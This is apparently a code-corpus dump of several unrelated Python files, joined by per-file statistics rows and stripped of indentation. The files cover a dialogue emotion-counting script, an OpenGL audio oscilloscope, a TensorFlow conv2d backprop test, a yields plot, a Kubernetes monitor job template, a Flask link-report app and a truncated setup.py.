# current emotion sum
current_neu = 0
current_sur = 0
current_fea = 0
current_sad = 0
current_joy = 0
current_dis = 0
current_ang = 0
# previous emotion sum
pre_neu = 0
pre_sur = 0
pre_fea = 0
pre_sad = 0
pre_joy = 0
pre_dis = 0
pre_ang = 0
# check index error sum
indexerror_sum = 0
for i, l in enumerate(laughter_index):
dia_index = l[0]
utt_index = l[1]
current_df = df[(df['Dialogue_ID'] == dia_index) & (df['Utterance_ID'] == utt_index)]
current_utt = current_df['Utterance'].values.tolist()
current_senti = current_df['Sentiment'].values.tolist()
current_emo = current_df['Emotion'].values.tolist()
try:
if current_senti == ['neutral']:
current_neutral += 1
elif current_senti == ['positive']:
current_positive += 1
elif current_senti == ['negative']:
current_negative += 1
else:
pass
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
if current_emo == ['neutral']:
current_neu += 1
elif current_emo == ['surprise']:
current_sur += 1
elif current_emo == ['fear']:
current_fea += 1
elif current_emo == ['sadness']:
current_sad += 1
elif current_emo == ['joy']:
current_joy += 1
elif current_emo == ['disgust']:
current_dis += 1
elif current_emo == ['anger']:
current_ang += 1
else:
pass
# check previous sentiment
if utt_index > 0:
previous_df = df[(df['Dialogue_ID'] == dia_index) & (df['Utterance_ID'] == (utt_index-1))]
pre_utt = previous_df['Utterance'].values.tolist()
pre_senti = previous_df['Sentiment'].values.tolist()
pre_emo = previous_df['Emotion'].values.tolist()
if pre_senti == ['neutral']:
previous_neutral += 1
elif pre_senti == ['positive']:
previous_positive += 1
elif pre_senti== ['negative']:
previous_negative += 1
else:
pass
# check previous emotion
if pre_emo == ['neutral']:
pre_neu += 1
elif pre_emo == ['surprise']:
pre_sur += 1
elif pre_emo== ['fear']:
pre_fea += 1
elif pre_emo == ['sadness']:
pre_sad += 1
elif pre_emo == ['joy']:
pre_joy += 1
elif pre_emo == ['disgust']:
pre_dis += 1
elif pre_emo == ['anger']:
pre_ang += 1
else:
pass
else:
pass
except IndexError:
indexerror_sum += 1
print('***IndexError***')
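# A more compact alternative to the elif chains above (a hedged sketch; the
# names below are hypothetical and not part of the original script):
# from collections import Counter
# current_emo_counts = Counter()
# for label in current_emo:
#     current_emo_counts[label] += 1
# This generalizes to any label set without per-label counter variables.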
def whole_senti_graph():
[neutral, positive, negative] = [4710, 2334, 2945]
X = np.array(['neutral', 'positive', 'negative'])
Y = np.array([neutral, positive, negative])
plt.title('Sentiment in Whole Utterances')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def whole_emo_graph():
[neutral, surprise, fear, sadness, joy, disgust, anger] = [4710, 1205, 268, 683, 1743, 271, 1109]
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([neutral, surprise, fear, sadness, joy, disgust, anger])
plt.title('Emotion in Whole Utterances')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def current_senti_graph():
print("current_neutral:{} \ncurrent_positive:{}, \ncurrent_negative:{}".format(current_neutral, current_positive, current_negative))
print("IndexError_SUM:{}".format(indexerror_sum))
X = np.array(['current_neutral', 'current_positive', 'current_negative'])
Y = np.array([current_neutral, current_positive, current_negative])
plt.title('Current_Sentiment')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def previous_senti_graph():
print("previous_neutral:{} \n previous_positive:{}, \n previous_negarive:{}".format(previous_neutral, previous_positive, previous_negative))
X = np.array(['previous_neutral', 'previous_positive', 'previous_negative'])
Y = np.array([previous_neutral, previous_positive, previous_negative])
plt.title('Previous_Sentiment')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
# emotion
# label index mapping = {'neutral': 0, 'surprise': 1, 'fear': 2, 'sadness': 3, 'joy': 4, 'disgust': 5, 'anger': 6}
def current_emo_graph():
print('current_neutral:{}, current_surprise:{}, current_fear:{}, current_sadness:{}, current_joy:{}, current_disgust:{}, current_anger:{}'.format(current_neu, current_sur, current_fea, current_sad, current_joy, current_dis, current_ang))
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([current_neu, current_sur, current_fea, current_sad, current_joy, current_dis, current_ang])
plt.title('Current_Emotion')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
def previous_emo_graph():
print('pre_neutral:{}, pre_surprise:{}, pre_fear:{}, pre_sadness:{}, pre_joy:{}, pre_disgust:{}, pre_anger:{}'.format(pre_neu, pre_sur, pre_fea, pre_sad, pre_joy, pre_dis, pre_ang))
X = np.array(['neutral', 'surprise', 'fear', 'sadness', 'joy', 'disgust', 'anger'])
Y = np.array([pre_neu, pre_sur, pre_fea, pre_sad, pre_joy, pre_dis, pre_ang])
plt.title('Previous_Emotion')
plt.pie(Y, labels=X, counterclock=False, startangle=90, autopct="%1.1f%%")
plt.show()
if __name__ == '__main__':
# current_senti_graph()
# previous_senti_graph()
# current_emo_graph()
# previous_emo_graph()
whole_senti_graph()
# whole_emo_graph()
| 35.72 | 241 | 0.634814 | 1,029 | 8,037 | 4.724976 | 0.14966 | 0.016454 | 0.019745 | 0.018511 | 0.371658 | 0.31777 | 0.299054 | 0.290621 | 0.247429 | 0.238996 | 0 | 0.024142 | 0.216623 | 8,037 | 224 | 242 | 35.879464 | 0.748094 | 0.177181 | 0 | 0.192308 | 0 | 0 | 0.177589 | 0.022199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044872 | false | 0.032051 | 0.051282 | 0 | 0.108974 | 0.044872 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a29ef47ca666384abf9e6ed95f2497dd46437592 | 4,682 | py | Python | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | 1 | 2022-02-25T12:24:42.000Z | 2022-02-25T12:24:42.000Z | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | null | null | null | Tutorial_8/main.py | xziyue/pyopengl_series_source | 3dc6afa808fc62aa3fd0b17631758f9f437ebd15 | [
"MIT"
] | 4 | 2020-11-17T21:59:19.000Z | 2022-03-05T11:31:26.000Z | import audioread
import numpy as np
import openal
audioBuffer = []
sampleRate = None
audioLength = None
soundFile = 'Jerobeam Fenderson - Planets.wav'
# open with OpenAL
alSound = openal.oalOpen(soundFile)
# load audio
with audioread.audio_open(soundFile) as inaudio:
assert inaudio.channels == 2
sampleRate = inaudio.samplerate
audioLength = inaudio.duration
for buf in inaudio:
data = np.frombuffer(buf, dtype=np.int16)
audioBuffer.append(data)
dataBuffer = np.concatenate(audioBuffer).reshape((-1, 2)).astype(np.float32)
numTotalSamples = dataBuffer.shape[0]
dataBuffer /= (0x7fff - 1) # normalize int16 samples to roughly [-1, 1] (int16 max is 0x7fff)
dataBuffer = dataBuffer.flatten()
'''
# shows Lissajous curve
#tArray = np.arange(0, 1000000).astype(np.float)
tArray = np.linspace(0, 1000000, 1000000).astype(np.float)
numTotalSamples = tArray.size
x = np.sin(5.0 * tArray)
y = np.sin(4.0 * tArray)
sampleRate = 40000
audioLength = tArray.size // sampleRate
dataBuffer = np.stack([x, y], axis=1)
dataBuffer -= dataBuffer.min()
dataBuffer /= dataBuffer.max()
dataBuffer = (dataBuffer - 0.5) * 2.0
dataBuffer = dataBuffer.astype(np.float32).flatten()
'''
from OpenGL.GL import *
from OpenGL.arrays.vbo import VBO
import glfw
import platform as pyPlatform
import ctypes
from datetime import datetime
# add last folder into PYTHONPATH
import sys, os
lastFolder = os.path.split(os.getcwd())[0]
sys.path.append(lastFolder)
from gl_lib.transmat import *
from gl_lib.utility import *
from gl_lib.fps_camera import *
from Tutorial_8.shader import *
windowSize = (800, 600)
windowBackgroundColor = (0.2, 0.2, 0.2, 1.0)
waveColor = np.asarray([0.0, 1.0, 0.0], np.float32)
tailDuration = 0.1
numTailSamples = int(np.round(tailDuration * sampleRate))
def debug_message_callback(source, msg_type, msg_id, severity, length, raw, user):
msg = raw[0:length]
print('debug', source, msg_type, msg_id, severity, msg)
def create_uniform(programId, infos):
result = dict()
for name, tp in infos:
uniform = GLUniform(programId, name, tp)
result[name] = uniform
return result
if __name__ == '__main__':
# initialize glfw
glfw.init()
# set glfw config
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)
glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
if pyPlatform.system().lower() == 'darwin':
glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)
# create window
theWindow = glfw.create_window(windowSize[0], windowSize[1], 'Audio Oscilloscope', None, None)
# make window the current context
glfw.make_context_current(theWindow)
# enable z-buffer
glEnable(GL_DEPTH_TEST)
dataVBO = VBO(dataBuffer, usage='GL_STATIC_DRAW')
dataVAO = glGenVertexArrays(1)
glBindVertexArray(dataVAO)
dataVBO.bind()
dataVBO.copy_data()
glVertexAttribPointer(0, 2, GL_FLOAT, GL_FALSE, 2 * ctypes.sizeof(ctypes.c_float), ctypes.c_void_p(0))
glEnableVertexAttribArray(0)
dataVBO.unbind()
glBindVertexArray(0)
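# Layout note for the attribute setup above: each vertex is one stereo
# sample, two float32 components (left channel as x, right channel as y),
# hence the component count of 2 and the stride of 2 * sizeof(c_float).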
renderProgram = GLProgram(waveVertexShaderSource, waveFragmentShaderSource)
renderProgram.compile_and_link()
waveColorUniform = GLUniform(renderProgram.get_program_id(), 'waveColor', 'vec3f')
# change drawing mode
# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
startTime = glfw.get_time()
soundPlayed = False
# keep rendering until the window should be closed
while not glfw.window_should_close(theWindow):
nowTime = glfw.get_time()
if nowTime - startTime > audioLength:
glfw.set_window_should_close(theWindow, True)
continue
# set background color
glClearColor(*windowBackgroundColor)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
aspect = windowSize[0] / windowSize[1]
renderProgram.use()
waveColorUniform.update(waveColor)
nowLocation = min(numTotalSamples, int(np.round((nowTime - startTime) * sampleRate)))
startLocation = max(0, nowLocation - numTailSamples)
glBindVertexArray(dataVAO)
glDrawArrays(GL_POINTS, startLocation, nowLocation - startLocation)
glBindVertexArray(0)
# tell glfw to poll and process window events
glfw.poll_events()
# swap frame buffer
glfw.swap_buffers(theWindow)
if not soundPlayed:
alSound.play()
soundPlayed = True
# clean up VAO
glDeleteVertexArrays(1, [dataVAO])
# clean up VBO
dataVBO.delete()
# clean up program
renderProgram.delete()
# terminate glfw
glfw.terminate()
openal.oalQuit()
| 26.908046 | 106 | 0.703118 | 570 | 4,682 | 5.649123 | 0.415789 | 0.031056 | 0.017391 | 0.02236 | 0.051553 | 0.036025 | 0 | 0 | 0 | 0 | 0 | 0.025451 | 0.194361 | 4,682 | 173 | 107 | 27.063584 | 0.828208 | 0.09056 | 0 | 0.042105 | 0 | 0 | 0.025736 | 0 | 0 | 0 | 0.001592 | 0 | 0.010526 | 1 | 0.021053 | false | 0 | 0.147368 | 0 | 0.178947 | 0.010526 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a27e6e750f04e65c2fd9e64ce1f190d0b8590a | 4,341 | py | Python | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | test/python/test_conv2dbackpropinput.py | sreeni-k/ngraph-tf | 4280a49ecffb92bb1ffa8ea212b22e0db8729f6e | [
"Apache-2.0"
] | null | null | null | # ==============================================================================
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge depthwise_conv2d operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import tensorflow as tf
from tensorflow.python.framework import constant_op
from tensorflow.python.ops import nn_ops
from common import NgraphTest
import numpy as np
class TestConv2DBackpropInput(NgraphTest):
INPUT_SIZES_NCHW = [1, 2, 7, 6]
INPUT_SIZES_NHWC = [1, 7, 6, 2]
FILTER_IN_SIZES = [3, 3, 2, 2]
OUT_BACKPROP_IN_SIZES = {"VALID": [1, 2, 3, 2], "SAME": [1, 2, 4, 3]}
def make_filter_and_backprop_args(self, out_backprop_in_sizes):
total_size_1 = 1
total_size_2 = 1
for s in out_backprop_in_sizes:
total_size_1 *= s
for s in self.FILTER_IN_SIZES:
total_size_2 *= s
x1 = [f * 1.0 for f in range(1, total_size_1 + 1)]
x2 = [f * 1.0 for f in range(1, total_size_2 + 1)]
return x1, x2
@pytest.mark.parametrize("padding", ("VALID", "SAME"))
def test_nchw(self, padding):
# The expected size of the backprop will depend on whether padding is VALID
# or SAME.
out_backprop_in_sizes = self.OUT_BACKPROP_IN_SIZES[padding]
x1, x2 = self.make_filter_and_backprop_args(out_backprop_in_sizes)
def run_test_ngraph(sess):
t1 = constant_op.constant(self.INPUT_SIZES_NCHW)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 1, 2, 2],
padding=padding,
data_format='NCHW')
return sess.run(inp)
# To validate on the CPU side we will need to run in NHWC, because the CPU
# implementation of conv/conv backprop does not support NCHW. We will
# transpose on the way in and on the way out.
def run_test_tf(sess):
t1 = constant_op.constant(self.INPUT_SIZES_NHWC)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
t3 = tf.transpose(t3, [0, 2, 3, 1])
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 2, 2, 1],
padding=padding,
data_format='NHWC')
inp = tf.transpose(inp, [0, 3, 1, 2])
return sess.run(inp)
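# Axis-order note: tf.transpose with perm=[0, 2, 3, 1] maps NCHW -> NHWC and
# perm=[0, 3, 1, 2] maps back, so run_test_tf computes the same backprop as
# run_test_ngraph, just in the layout the CPU kernel supports.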
assert np.allclose(
self.with_ngraph(run_test_ngraph), self.without_ngraph(run_test_tf))
@pytest.mark.skip(reason="Fails, needs debugging")
@pytest.mark.parametrize("padding", ("VALID", "SAME"))
def test_nhwc(self, padding):
out_backprop_in_sizes = self.OUT_BACKPROP_IN_SIZES[padding]
x1, x2 = self.make_filter_and_backprop_args(out_backprop_in_sizes)
t1 = constant_op.constant(self.INPUT_SIZES_NHWC)
t2 = constant_op.constant(x2, shape=self.FILTER_IN_SIZES)
t3 = constant_op.constant(x1, shape=out_backprop_in_sizes)
t3 = tf.transpose(t3, [0, 2, 3, 1])
inp = nn_ops.conv2d_backprop_input(
t1,
t2,
t3,
strides=[1, 2, 2, 1],
padding=padding,
data_format='NHWC')
def run_test(sess):
return sess.run(inp)
assert (
self.with_ngraph(run_test) == self.without_ngraph(run_test)).all()
| 37.102564 | 83 | 0.608155 | 590 | 4,341 | 4.245763 | 0.261017 | 0.047505 | 0.062275 | 0.086228 | 0.468263 | 0.397605 | 0.397605 | 0.37525 | 0.323353 | 0.323353 | 0 | 0.034331 | 0.268602 | 4,341 | 116 | 84 | 37.422414 | 0.754646 | 0.241419 | 0 | 0.5 | 0 | 0 | 0.022964 | 0 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0.078947 | false | 0 | 0.118421 | 0.013158 | 0.315789 | 0.013158 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a400716f3e13183b5cef28f9e408102ab1984b | 1,266 | py | Python | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | 1 | 2020-03-30T02:33:45.000Z | 2020-03-30T02:33:45.000Z | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | null | null | null | chemevo/scripts/YieldsPlots.py | ktfm2/Kai_updates | f731922d3e140c1f16ea9b4b45f39232fe19a1ba | [
"MIT"
] | 2 | 2018-09-26T05:15:33.000Z | 2020-09-27T21:10:11.000Z | # coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import pandas as pd
def yields_plot(fname,outname,masses=[1.,2.,5.],Z=0.001,lim=[10**-18,50.],label='',clabel=r'$M_\star/\mathrm{M}_\odot$'):
data = pd.read_csv(fname,sep=r'\s+')
data = data[data.Z==Z].reset_index(drop=True)
fig = plt.figure(figsize=[15.,4.])
norm = colors.Normalize(vmin=np.min(masses),vmax=np.max(masses))
c_m = plt.cm.viridis
s_m = plt.cm.ScalarMappable(cmap=c_m, norm=norm)
s_m.set_array([])
for m in masses:
plt.plot(data[data.M==m].Yield.values,'.-',markersize=10,color=s_m.to_rgba(m))
cmm=plt.colorbar(s_m)
cmm.set_label(clabel)
ele = data.Element.values
indexes = np.unique(ele, return_index=True)[1]
el= [ele[index] for index in sorted(indexes)]
plt.xticks(range(len(el)),el)
plt.semilogy()
plt.ylabel(r'$M_\mathrm{el}/\mathrm{M}_\odot$')
plt.ylim(lim[0],lim[1])
plt.annotate(label,
xy=(0.95,0.05),horizontalalignment='right',verticalalignment='bottom',
xycoords='axes fraction',clip_on=False,fontsize=24)
plt.tight_layout()
plt.savefig(outname)
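# Expected input format (inferred from the column accesses above, not stated
# in the original): a whitespace-separated table with at least the columns
# Z, M, Element and Yield, one row per (mass, element) pair at each
# metallicity Z.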
if __name__ == '__main__':
yields_plot('tmp','output.png')
| 32.461538 | 121 | 0.651659 | 204 | 1,266 | 3.906863 | 0.544118 | 0.010038 | 0.027604 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028382 | 0.165087 | 1,266 | 38 | 122 | 33.315789 | 0.725639 | 0.010269 | 0 | 0 | 0 | 0 | 0.086331 | 0.046363 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.133333 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a7c07340e6fb5b1178797bdbd9ffee13790ccb | 4,179 | py | Python | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | src/a01/jobs/monitor.py | mcardosos/adx-automation-client | d657ff85b0f0e408e5c64703c47798d164f49a35 | [
"MIT"
] | null | null | null | from typing import List
from kubernetes.client.models.v1_config_map_key_selector import V1ConfigMapKeySelector
from kubernetes.client.models.v1_job import V1Job
from kubernetes.client.models.v1_job_spec import V1JobSpec
from kubernetes.client.models.v1_object_meta import V1ObjectMeta
from kubernetes.client.models.v1_container import V1Container
from kubernetes.client.models.v1_pod_spec import V1PodSpec
from kubernetes.client.models.v1_pod_template_spec import V1PodTemplateSpec
from kubernetes.client.models.v1_local_object_reference import V1LocalObjectReference
from kubernetes.client.models.v1_env_var import V1EnvVar
from kubernetes.client.models.v1_env_var_source import V1EnvVarSource
from kubernetes.client.models.v1_secret_key_selector import V1SecretKeySelector
from a01.models import Run
from a01.common import EMAIL_ACCOUNT_SECRET_NAME, EMAIL_SERVICE_FAIL_RESET_LIMIT, COMMON_IMAGE_PULL_SECRET
MONITOR_IMAGE = 'azureclidev.azurecr.io/a01monitor:latest'
class MonitorTemplate(object):
def __init__(self, run: Run, interval: int = 30, email: str = None) -> None:
self.run = run
self.name = f'a01-monitor-{self.run.id}'
self.labels = {'run_id': str(run.id), 'run_live': run.details['live']}
self.official = run.details.get('remark', '').lower() == 'official'
self.interval = interval
self.email = email
def get_body(self) -> V1Job:
return V1Job(
api_version='batch/v1',
kind='Job',
metadata=self.get_metadata(),
spec=self.get_spec())
def get_metadata(self) -> V1ObjectMeta:
return V1ObjectMeta(name=self.name, labels=self.labels)
def get_spec(self) -> V1JobSpec:
return V1JobSpec(backoff_limit=EMAIL_SERVICE_FAIL_RESET_LIMIT, template=self.get_template())
def get_template(self) -> V1PodTemplateSpec:
return V1PodTemplateSpec(
metadata=V1ObjectMeta(name=self.name, labels=self.labels),
spec=self.get_pod_spec())
def get_pod_spec(self) -> V1PodSpec:
return V1PodSpec(
containers=self.get_containers(),
image_pull_secrets=[V1LocalObjectReference(name=COMMON_IMAGE_PULL_SECRET)],
restart_policy='Never')
def get_containers(self) -> List[V1Container]:
return [V1Container(name='main', image=MONITOR_IMAGE, env=self.get_environment_variables())]
def get_environment_variables(self) -> List[V1EnvVar]:
environment = [
V1EnvVar(name='A01_MONITOR_RUN_ID', value=str(self.run.id)),
V1EnvVar(name='A01_MONITOR_INTERVAL', value=str(self.interval)),
V1EnvVar(name='A01_STORE_NAME', value='task-store-web-service-internal/api'),
V1EnvVar(name='A01_INTERNAL_COMKEY', value_from=V1EnvVarSource(
secret_key_ref=V1SecretKeySelector(name='a01store', key='internal.key')))
]
if self.email or self.official:
environment.extend([
self._map_secret_to_env('A01_REPORT_SMTP_SERVER', 'server'),
self._map_secret_to_env('A01_REPORT_SENDER_ADDRESS', 'username'),
self._map_secret_to_env('A01_REPORT_SENDER_PASSWORD', 'password')])
if self.official:
environment.append(self._map_config_to_env('A01_REPORT_RECEIVER', 'official.email'))
elif self.email:
environment.append(V1EnvVar(name='A01_REPORT_RECEIVER', value=self.email))
return environment
@staticmethod
def _map_secret_to_env(env_name: str, secret_key: str) -> V1EnvVar:
return V1EnvVar(name=env_name,
value_from=V1EnvVarSource(
secret_key_ref=V1SecretKeySelector(
name=EMAIL_ACCOUNT_SECRET_NAME,
key=secret_key)))
def _map_config_to_env(self, env_name: str, config_key: str) -> V1EnvVar:
config_name = self.run.details['product']
return V1EnvVar(name=env_name,
value_from=V1EnvVarSource(
config_map_key_ref=V1ConfigMapKeySelector(name=config_name, key=config_key)))
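# Minimal usage sketch (hedged; assumes a populated Run object, and the
# namespace below is hypothetical):
# template = MonitorTemplate(run, interval=60, email='dev@example.com')
# body = template.get_body()
# kubernetes.client.BatchV1Api().create_namespaced_job(namespace='a01', body=body)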
| 44.935484 | 106 | 0.689878 | 499 | 4,179 | 5.492986 | 0.226453 | 0.056184 | 0.080263 | 0.104341 | 0.272163 | 0.202116 | 0.156877 | 0.093032 | 0 | 0 | 0 | 0.025236 | 0.21297 | 4,179 | 92 | 107 | 45.423913 | 0.808148 | 0 | 0 | 0.054054 | 0 | 0 | 0.094999 | 0.041397 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.013514 | 0.189189 | 0.094595 | 0.459459 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a9508db77d089cd717baa207d26992fc58ffc4 | 3,776 | py | Python | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | 1 | 2019-12-10T16:37:22.000Z | 2019-12-10T16:37:22.000Z | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | 18 | 2019-11-15T21:44:52.000Z | 2020-01-03T05:54:56.000Z | src/app.py | AntiCompositeNumber/linkspam | 12dd89e156abdb3811d863fa47e840086810897d | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
# SPDX-License-Identifier: Apache-2.0
# Copyright 2019 AntiCompositeNumber
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import json
import subprocess
import flask
# Configure logging
logging.basicConfig(filename='linkspam.log', level=logging.DEBUG)
# Set up Flask app
app = flask.Flask(__name__)
# Load config from json in the same directory as the app
__dir__ = os.path.dirname(__file__)
with open(os.path.join(__dir__, 'config.json')) as f:
app.config.update(json.load(f))
# Get the short hash for the current git commit
rev = subprocess.run(['git', 'rev-parse', '--short', 'HEAD'],
universal_newlines=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
app.config['version'] = rev.stdout.strip() # drop the trailing newline from git output
@app.route('/')
def linksearch():
# Front page
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
return flask.render_template('linkspam.html', data=data)
# @app.route('/<target>/job')
# def linksearch_job(target):
# percent = flask.request.args.get('percent', '')
# return flask.render_template('linkspam_submit.html',
# percent=percent)
@app.route('/api')
def api():
return {} # Flask views may not return None; return an empty JSON object instead
@app.route('/api/status')
def api_status():
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
return data
@app.route('/api/status/<target>')
def api_status_target(target):
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
target_info = data.get(target)
if not target_info:
flask.abort(404)
else:
return target_info
@app.route('/api/report/<target>')
def api_report_target(target):
try:
with open(os.path.join(app.config['linkspam_data_dir'],
target + '.json')) as f:
data = json.load(f)
except FileNotFoundError:
# If there is no file found, return 404
flask.abort(404)
else:
return data
@app.route('/<target>')
def linksearch_result(target):
# Result pages
# Try to load the report specified in the URL
try:
with open(os.path.join(app.config['linkspam_data_dir'],
target + '.json')) as f:
data = json.load(f)
except FileNotFoundError:
# If there is no file found, return a custom 404
return flask.render_template(
'linkspam_noresult.html', target=target), 404
else:
# Otherwise, show the report
return flask.render_template('linkspam_result.html', data=data)
@app.route('/<target>/status')
def linksearch_status(target):
with open(os.path.join(app.config['linkspam_data_dir'],
'linkspam_config.json')) as f:
data = json.load(f)
target_info = data.get(target)
if not target_info:
return flask.render_template(
'linkspam_noresult.html', target=target), 404
else:
return flask.render_template('status.html', data=target_info)
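# Example requests against the routes above (paths as defined in this file):
# GET /api/status -> full linkspam_config.json contents
# GET /api/status/<target> -> one target's status, 404 if unknown
# GET /api/report/<target> -> the target's report JSON, 404 if missing
# GET /<target> -> rendered HTML report, custom 404 page if missing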
| 29.046154 | 74 | 0.644068 | 502 | 3,776 | 4.731076 | 0.304781 | 0.020211 | 0.029474 | 0.041263 | 0.413053 | 0.346947 | 0.325053 | 0.325053 | 0.325053 | 0.325053 | 0 | 0.010438 | 0.238877 | 3,776 | 129 | 75 | 29.271318 | 0.815936 | 0.305614 | 0 | 0.535211 | 0 | 0 | 0.159599 | 0.016962 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098592 | false | 0 | 0.070423 | 0.014085 | 0.295775 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2a954aea3a61fd5213339931e0d242897520116 | 1,130 | py | Python | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | 2 | 2017-05-15T15:33:45.000Z | 2020-10-24T11:09:12.000Z | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | 2 | 2018-05-02T21:45:33.000Z | 2020-10-24T11:13:05.000Z | setup.py | woctezuma/puissance4 | 68f82149515ebe87f545cb6211670df75210e702 | [
"MIT"
] | null | null | null | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name='puissance4',
